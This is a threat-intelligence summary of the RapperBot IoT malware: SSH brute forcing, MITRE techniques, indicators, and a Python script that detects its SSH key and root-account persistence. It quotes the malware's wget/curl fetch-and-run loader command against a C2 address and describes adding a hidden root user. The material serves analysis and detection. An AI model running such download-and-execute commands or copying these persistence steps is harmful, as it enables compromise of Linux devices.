FortiGuard Labs tracks RapperBot, a rapidly evolving IoT malware family that borrows heavily from Mirai but switches from Telnet to SSH brute forcing for initial access on Linux devices. The campaign shows notable persistence and credential-access capabilities, including SSH key-based persistence and root-privilege additions, with unclear ultimate motives.
#RapperBot #Mirai #FortiGuardLabs #SSH #Linux #Fortinet
Keypoints
- RapperBot is an IoT malware family evolving since June 2022, derived from Mirai but focused on SSH brute forcing instead of Telnet.
- The malware increasingly emphasizes persistence, enabling continued SSH access after reboot or removal by manipulating authorized_keys.
- Early samples attempted self-propagation via a remote loader, but later samples removed this capability and focused on retaining access to brute-forced SSH servers.
- RapperBot targets multiple architectures (ARM, MIPS, SPARC, x86) and uses an SSH 2.0 client with Diffie-Hellman key exchange and AES128-CTR for authentication.
- It identifies itself to SSH servers with the client string “SSH-2.0-HELLOWORLD” and retrieves credential lists from the C2 server, sometimes on ports 4343–4345.
- After brute-forcing, valid credentials are reported back to the C2 on a separate port (currently 48109); the network protocol and command set govern registration, keep-alive, and very limited DoS actions.
MITRE Techniques
- [T1110] Brute Force – RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. “exclusively scans and attempts to brute force SSH servers configured to accept password authentication.”
- [T1027] Obfuscated/Compressed Files and Information – The latest samples implemented an XOR encoding layer to hide strings from memory scanners during execution. “additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution.”
- [T1136] Create Account – The malware adds a root user (“suhelper”) via /etc/passwd and /etc/shadow to retain access. “root user ‘suhelper’ by directly writing to ‘/etc/passwd’ and ‘/etc/shadow/’.”
- [T1098] Account Manipulation – RapperBot modifies the victim’s authorized_keys to maintain SSH access, including adding its public key with a persistent comment. “replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment ‘helloworld’.”
- [T1105] Ingress Tool Transfer – Early behavior included downloading and executing payloads via wget/curl, indicating loader-like download activity. “wget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- | sh.”
- [T1071] Application Layer Protocol – C2 communications over TCP to receive commands, download credentials, and report results (e.g., port 443 in latest samples). “RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples).”
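A host-level check for the two persistence artefacts listed under T1136 and T1098, as an added example rather than code from the FortiGuard write-up: it flags an authorized_keys entry whose comment is "helloworld" and a "suhelper" or extra UID-0 account in /etc/passwd. It assumes the caller reads the file contents from the device (the sample inputs below are constructed).

```python
from typing import Dict, List

KEY_COMMENT = "helloworld"   # comment on the actor's SSH public key (from the report)
ROOT_ACCOUNT = "suhelper"    # root user the malware writes to /etc/passwd and /etc/shadow
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")  # prefixes of OpenSSH key-type tokens

def suspicious_authorized_keys(text: str) -> List[str]:
    """Return one finding per key line that carries the RapperBot comment."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # An optional options field (e.g. from="...") may precede the key type.
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPES)), None)
        if idx is None or len(tokens) < idx + 2:
            continue  # not a parseable key line
        comment = " ".join(tokens[idx + 2:])  # comment may contain spaces
        if comment.lower() == KEY_COMMENT:
            findings.append(f"authorized_keys line {lineno}: key with comment '{comment}'")
    return findings

def suspicious_passwd(text: str) -> List[str]:
    """Flag the known account name and any UID-0 account other than root."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split(":")
        if len(fields) < 7:
            continue  # malformed or blank passwd line
        name, uid = fields[0], fields[2]
        if name == ROOT_ACCOUNT:
            findings.append(f"passwd line {lineno}: account '{name}' present")
        elif uid == "0" and name != "root":
            findings.append(f"passwd line {lineno}: extra UID-0 account '{name}'")
    return findings

# Constructed sample input (not real victim data): one legitimate key, one actor key.
SAMPLE_KEYS = ('from="10.0.0.5" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEY admin@ops\n'
               'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLE helloworld\n')
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/sh\n"
                 "suhelper:x:0:0::/:/bin/sh\n"
                 "nobody:x:65534:65534::/:/bin/false\n")

def hunt(keys_text: str = SAMPLE_KEYS, passwd_text: str = SAMPLE_PASSWD) -> Dict[str, List[str]]:
    return {"authorized_keys": suspicious_authorized_keys(keys_text),
            "passwd": suspicious_passwd(passwd_text)}

if __name__ == "__main__":
    for area, hits in hunt().items():
        for hit in hits:
            print(f"[{area}] {hit}")
```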
Indicators of Compromise
- [File Hashes] 92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4, a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45a, and 2 more hashes
- [Download URLs] hxxp://31[.]44[.]185[.]235/x86, hxxp://31[.]44[.]185[.]235/mips, and 6 more URLs
- [C2] 31[.]44[.]185[.]235, 2[.]58[.]149[.]116, and other IPs
- [SSH Public Key] Threat actor SSH public key (the key written into victims' authorized_keys with the comment "helloworld")
Read more: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery